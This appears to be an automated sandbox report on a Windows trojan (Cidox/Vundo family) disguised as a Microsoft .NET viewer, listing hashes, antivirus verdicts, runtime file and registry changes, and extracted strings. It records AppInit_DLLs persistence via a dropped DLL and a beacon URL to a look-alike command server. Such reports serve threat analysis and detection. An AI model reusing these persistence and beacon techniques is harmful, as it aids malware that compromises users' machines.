Analysis Date: 2014-11-30 18:09:44
MD5: c6992e84d0bf7f790628327e6413e462
SHA1: b5a7d2a03641ee64af9061880ef27aee446c187b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: adf32ccf9922242eaee61c738cd1ae66 sha1: 7d47dc758465eb7516c09359e9eac2f5055a414c size: 27136
Section: .rdata md5: 7a5c509b614766e6ef18351017ab61f7 sha1: 4529a0aec47bb99e3ea92834146f2b2735a7a5ba size: 7680
Section: .data md5: 31789e4f2ccb9bcd6f2b7bf0a1298b49 sha1: 9d1ca1112c71e51599d1293b7d9f4beea028e12a size: 5120
Section: .rsrc md5: 28cbcac1d6eb588a7e4d1081d7ce040f sha1: 17aa345e6b2273527b00d6d276f4355fce4ea93a size: 139776
Timestamp: 2012-12-18 17:04:04
Version:
LegalCopyright: © Microsoft Corporation. All rights reserved.
InternalName: NETFXSBS10.exe
FileVersion: 2.0.50727.42 (RTM.050727-4200)
CompanyName: Microsoft Corporation
Comments: Flavor=Retail
ProductName: Microsoft® .NET Framework
ProductVersion: 2.0.50727.42
FileDescription: Microsoft .NET viewer
OriginalFilename: NETFXSBS10.exe
Packer: Microsoft Visual C++ ?.?
PEhash: 2ddf6ac218174d913b020c5b622ad80fcc481af7
IMPhash: ecace9b6a70583493455288bf01f7bbc
AV 360 Safe: Gen:Variant.Symmi.8415
AV Ad-Aware: Gen:Variant.Symmi.8415
AV Alwil (avast): Crypt-OQY [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Cidox.A.gen!Eldorado
AV Avira (antivir): TR/Drop.Vundo.voua
AV BullGuard: Gen:Variant.Symmi.8415
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Vundo.Gen
AV ClamAV: WIN.Trojan.Cidox-1024
AV Dr. Web: Trojan.Inject1.15498
AV Emsisoft: Gen:Variant.Symmi.8415
AV Eset (nod32): Win32/Kryptik.AQUP
AV Fortinet: W32/Kryptik.FAGX!tr
AV Frisk (f-prot): W32/Cidox.A.gen!Eldorado
AV F-Secure: Gen:Variant.Symmi.8415
AV Grisoft (avg): Generic_r.BZR
AV Ikarus: Backdoor.Win32.Cidox
AV K7: Backdoor ( 04c547291 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Cidox.WMP
AV Mcafee: Vundo-FAGX!C6992E84D0BF
AV Microsoft Security Essentials: TrojanDropper:Win32/Vundo.V
AV MicroWorld (escan): Gen:Variant.Symmi.8415
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: Backdoor.Trojan
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): Malware-Cryptor.SB

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: C:\WINDOWS\system32\zylkmei.dll
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\zylkmei.dll\\x00

Network Details:

HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjk+hScGIDlQq
User-Agent:

Raw Pcap

Strings
040904B0
1s%P
2.0.50727.42
2.0.50727.42 (RTM.050727-4200)
bsJP2
Comments
CompanyName
credui.dll
&File
FileDescription
FileVersion
Flavor=Retail
                                 H
         (((((                  H
H|1%i
h&About ...
&Help
         h((((                  H
iE&xit
InternalName
Js2P
JSOPEN
KERNEL32.DLL
LegalCopyright
MAINICON
Microsoft
Microsoft Corporation
 Microsoft Corporation.  All rights reserved.
Microsoft .NET viewer
mscoree.dll
MS Shell Dlg
 .NET Framework
NETFXSBS10.exe
OriginalFilename
ProductName
ProductVersion
SCRIPTS
ssPP
StringFileInfo
Translation
{tw-
VarFileInfo
VS_VERSION_INFO
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
An application has made an attempt to load the C runtime library incorrectly.
apjH ?
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
A \z5C
,>bddd>
BeginPaint
CloseHandle
CorExitProcess
>cQjL)M
- CRT not initialized
d}23	i
@.data
d%}.c!Lw
dddd, MMMM dd, yyyy
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. 
D{!J(4:	
DOMAIN error
EncodePointer
EndPaint
EnterCriticalSection
erbhn$.>
ExitProcess
EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. 
February
fEeeeeeee
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
Fogci9y
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
.FrMt\
]-#g3RMv
GDrqq)
GetACP
GetActiveWindow
GetCommandLineA
GetCommandLineW
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
GF+v^:*
ggggggggggggggg<n
_gKhn"+
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
InitializeCriticalSectionAndSpinCount
;INNNNNdNNd%
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
`J8%} 
JanFebMarAprMayJunJulAugSepOctNovDec
January
kernel32.dll
KERNEL32.dll
Last modified: Mayc
LCMapStringA
LCMapStringW
LeaveCriticalSection
LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective 
LkGo9m
L|{o^^=
LoadLibraryA
LoadLibraryW
lstrcmpiA
MessageBoxA
Microsoft Visual C++ Runtime Library
mK/HRM>
mm____4
MM/dd/yy
:_MMMMMb%
mmpppp4
;MNNNNNNNN%
Monday
moTUTTTTTTUUT=
mQ1aPN
mRpppp4
MultiByteToWideChar
Mv!=r-I
Njmvvm
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
ntdll.dll
October
"O$D9d
oftware). 
Please contact the application's support team for more information.
PPPPPPPP
Program: 
<program name unknown>
pUOs2rH
- pure virtual function call
QueryPerformanceCounter
Q}|vU\\\\=
^qwf^hu
`.rdata
Rn````4
RR````4
RTaaaa4
RtlUnwind
runtime error 
Runtime Error!
Saturday
sd>W8"=
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
]Sgcz.
!'/SHG
ShowWindow
SING error
SIV )n
=SOFTu
SOFTWARE LICENSE AGREEMENT
\s'R_8m
strstr
s|u]^=
Sunday
SunMonTueWedThuFriSat
Svm____4
\t^]6:
;t99P/;
TerminateProcess
TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. 
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
{T~Iqfb
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
Tuesday
- unable to initialize heap
- unable to open console device
UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. 
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
u{)'NL
UpdateWindow
UQPXY]Y[
URPQQh0Y@
USER32.dll
USER32.DLL
VirtualAlloc
VirtualFree
Wednesday
Wf`J[*
WideCharToMultiByte
wj<o5C
WLMqgV
WriteFile
wUUUUUUUUUWwwwwwwwwwwwwwuUUUUU